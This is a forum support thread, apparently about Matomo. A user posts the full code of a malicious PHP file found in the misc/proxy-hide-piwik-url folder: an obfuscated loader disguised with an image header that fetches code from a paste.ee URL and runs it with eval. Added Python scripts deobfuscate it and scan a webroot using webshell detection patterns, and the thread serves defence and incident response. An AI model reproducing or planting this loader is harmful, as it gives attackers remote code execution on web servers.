Malware after latest update

I found malware under a folder named "proxy-hide-piwik-url", containing a file with this code:

```php
%PNG
<?php 
// The bytes before <?php mimic an image header; the rest is a remote loader.
// Every ${"GLOBALS"}["x"]="love" makes ${${"GLOBALS"}["x"]} just another name for $love.
${"GLOBALS"}["delves"]="love";
${"GLOBALS"}["0xfah"]="you";
error_reporting(0);   // hide any PHP errors
set_time_limit(0);
${"GLOBALS"}["i"]="love";
${"GLOBALS"}["haxor"]="love";
${${"GLOBALS"}["haxor"]}=curl_init();                          // $love = curl_init();
${"GLOBALS"}["world"]="love";
${"GLOBALS"}["Thxngfa"]="love";
curl_setopt(${${"GLOBALS"}["i"]},
CURLOPT_URL,"https://paste.ee/r/MBkVN/0");                    // second stage is fetched from paste.ee
curl_setopt(${${"GLOBALS"}["world"]},CURLOPT_RETURNTRANSFER,1);
${${"GLOBALS"}["0xfah"]}=curl_exec(${${"GLOBALS"}["delves"]}); // $you = response body
curl_close(${${"GLOBALS"}["Thxngfa"]});
eval("?>".${${"GLOBALS"}["0xfah"]});                          // execute whatever was downloaded
?>
```
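As an added example (not code from the thread or from Matomo), here is a small Python deobfuscator for the `${"GLOBALS"}["alias"]="name"` indirection used in the script above. `SAMPLE` is the posted script copied as text; the paste.ee URL is only matched as a string and is never fetched. The alias-resolution rules and the "fetched content reaches eval()" check are my own reading of the script, not something Matomo provides.

```python
"""Deobfuscate the GLOBALS-alias loader quoted above and summarise what it does.

Added example; not code from the thread or from Matomo. SAMPLE is the script as
posted (the paste.ee URL is matched as text only, never downloaded)."""
from __future__ import annotations
import re

SAMPLE = r'''%PNG
<?php 
${"GLOBALS"}["delves"]="love";
${"GLOBALS"}["0xfah"]="you";
error_reporting(0);
set_time_limit(0);
${"GLOBALS"}["i"]="love";
${"GLOBALS"}["haxor"]="love";
${${"GLOBALS"}["haxor"]}=curl_init();
${"GLOBALS"}["world"]="love";
${"GLOBALS"}["Thxngfa"]="love";
curl_setopt(${${"GLOBALS"}["i"]},
CURLOPT_URL,"https://paste.ee/r/MBkVN/0");
curl_setopt(${${"GLOBALS"}["world"]},CURLOPT_RETURNTRANSFER,1);
${${"GLOBALS"}["0xfah"]}=curl_exec(${${"GLOBALS"}["delves"]});
curl_close(${${"GLOBALS"}["Thxngfa"]});
eval("?>".${${"GLOBALS"}["0xfah"]});
?>
'''

# ${"GLOBALS"}["alias"]="name";  -> the alias stands for the variable $name
ALIAS_DEF = re.compile(r'\$\{"GLOBALS"\}\["([^"]+)"\]\s*=\s*"([^"]+)"[ \t]*;[ \t]*\r?\n?')
# ${${"GLOBALS"}["alias"]}       -> a use of that variable
ALIAS_USE = re.compile(r'\$\{\$\{"GLOBALS"\}\["([^"]+)"\]\}')
URL = re.compile(r'https?://[^"\'\s]+')


def deobfuscate(src: str) -> str:
    """Drop the alias definitions and rewrite every alias use as a plain $variable."""
    aliases = dict(ALIAS_DEF.findall(src))
    body = ALIAS_DEF.sub("", src)

    def resolve(m: re.Match) -> str:
        try:
            return "$" + aliases[m.group(1)]
        except KeyError:
            raise ValueError(f"unresolved alias {m.group(1)!r}") from None

    body = ALIAS_USE.sub(resolve, body)
    # re-join argument lists the author split across lines (curl_setopt(...,\nCURLOPT_URL,...))
    return re.sub(r",[ \t]*\r?\n[ \t]*", ",", body)


def fetched_urls(src: str) -> list[str]:
    """URLs the script would download at run time (to block or hunt for, not to visit)."""
    return sorted(set(URL.findall(src)))


def evals_fetched_content(src: str) -> bool:
    """True when a variable filled by curl_exec()/file_get_contents() ends up inside eval()."""
    plain = deobfuscate(src)
    fetched = re.findall(r'\$(\w+)\s*=\s*(?:curl_exec|file_get_contents)\s*\(', plain)
    return any(re.search(r'\beval\s*\([^;]*\$' + re.escape(v) + r'\b', plain) for v in fetched)


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print("downloads:", fetched_urls(SAMPLE))
    print("executes downloaded code:", evals_fetched_content(SAMPLE))
```

Resolved, the script is just `$love = curl_init(); ... $you = curl_exec($love); eval("?>" . $you);`: it downloads whatever the paste currently holds and runs it, so the file on disk tells you nothing about what was actually executed; the paste content may have changed since, and the access logs around the requests to `asuh.jpg.php` are the better record.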

Hi @Criss
Could you give us the path of this file in the Matomo distribution?
@SteveG @Altamash_Shaikh @MisterGenest maybe you can have a look?

Sure, the path is mymatomo/misc/proxy-hide-piwik-url/asuh.jpg.php
I have now deleted the file and my Matomo seems to be working all right (it was also working before), but I wonder whether even the folder "proxy-hide-piwik-url" is a hack (it now contains only a "README.md" file).

Hey @Criss,

Matomo actually contains that folder. But only a README.md file should be located in there. Everything else is not part of our default packages.

If someone was able to place a malformed file there, you should take further steps to safeguard your server.
The script you posted above loads and executes some sort of bypass shell, which might allow modifying or executing other files on the server.

For Matomo you can run the system check to see if any files provided by Matomo itself were manipulated. But it might be better to also ensure other software on your webspace is secure, and maybe also change passwords…

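Matomo's system check only compares the files Matomo ships; the reply's point is that the dropper was planted in a directory that should hold nothing but README.md, and there may be more of them. As an added example (not Matomo's code and not the system check), the Python audit below walks a webroot and flags files that do not belong: the only-README.md rule for `misc/proxy-hide-piwik-url` is taken from the reply, the other indicators (double extension ending in `.php`, image header followed by `<?php`, `eval(`/`curl_exec(` and the GLOBALS-alias trick) are my own common-webshell heuristics, and the sample tree is constructed in a temporary directory.

```python
"""Audit a Matomo webroot for files that should not be there.

Added example, not Matomo code. EXPECTED encodes the reply's statement that
misc/proxy-hide-piwik-url ships with README.md only; the content indicators are
my own heuristics. build_sample_tree() writes a constructed tree to a tmp dir."""
from __future__ import annotations
import os
import re
import tempfile

# Directory -> the only file names that belong there (from the reply above).
EXPECTED = {"misc/proxy-hide-piwik-url": {"README.md"}}

DOUBLE_EXT = re.compile(r"\.(?:jpe?g|png|gif|ico|txt)\.php\d?$", re.I)
# Real PNG magic is 0x89 "PNG"; the post rendered the 0x89 byte as "%", so accept both.
IMAGE_MAGIC = (b"\x89PNG", b"%PNG", b"\xff\xd8\xff", b"GIF8")
PHP_TAG = b"<?php"
CODE_SMELLS = (
    (b"eval(", "eval"),
    (b"curl_exec(", "remote-fetch"),
    (b'${"GLOBALS"}[', "globals-alias-obfuscation"),
    (b"error_reporting(0)", "error-suppression"),
)


def inspect_file(path: str) -> list[str]:
    """Return the indicator labels that fire for one file (empty list = nothing odd)."""
    hits = []
    if DOUBLE_EXT.search(os.path.basename(path)):
        hits.append("double-extension")
    with open(path, "rb") as fh:
        data = fh.read(256 * 1024)  # header and body are enough for a loader this small
    if data.startswith(IMAGE_MAGIC) and PHP_TAG in data:
        hits.append("image-magic-then-php")
    if PHP_TAG in data:
        hits += [label for needle, label in CODE_SMELLS if needle in data]
    return hits


def audit(root: str) -> dict[str, list[str]]:
    """Map relative path -> indicators for every file worth a closer look under root."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        allowed = EXPECTED.get(rel_dir)
        for fn in files:
            rel = fn if rel_dir == "." else f"{rel_dir}/{fn}"
            hits = inspect_file(os.path.join(dirpath, fn))
            if allowed is not None and fn not in allowed:
                hits.append("not-in-expected-manifest")
            if hits:
                findings[rel] = hits
    return findings


# Constructed stand-in for the dropper from the thread (same structure, shortened).
LOADER = (b'%PNG\n<?php\n${"GLOBALS"}["a"]="love";\nerror_reporting(0);\n'
          b'${${"GLOBALS"}["a"]}=curl_init();\n$you=curl_exec($love);\n'
          b'eval("?>".$you);\n?>\n')


def build_sample_tree() -> str:
    """Write a small constructed webroot: a clean README.md, the dropper, a benign index.php."""
    root = tempfile.mkdtemp(prefix="matomo-audit-")
    d = os.path.join(root, "misc", "proxy-hide-piwik-url")
    os.makedirs(d)
    with open(os.path.join(d, "README.md"), "wb") as fh:
        fh.write(b"# proxy-hide-piwik-url\n")
    with open(os.path.join(d, "asuh.jpg.php"), "wb") as fh:
        fh.write(LOADER)
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b"<?php echo 'legit';\n")
    return root


if __name__ == "__main__":
    for path, hits in audit(build_sample_tree()).items():
        print(path, "->", ", ".join(hits))
```

Run it against the real webroot (`audit("/var/www/mymatomo")`) and treat every hit as something to diff against a pristine Matomo archive of the same version; a file that is neither in that archive nor in your own deployment notes is the one to look at, along with the web server access log entries for its path.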

Thanks for checking and giving prompt feedback 🙂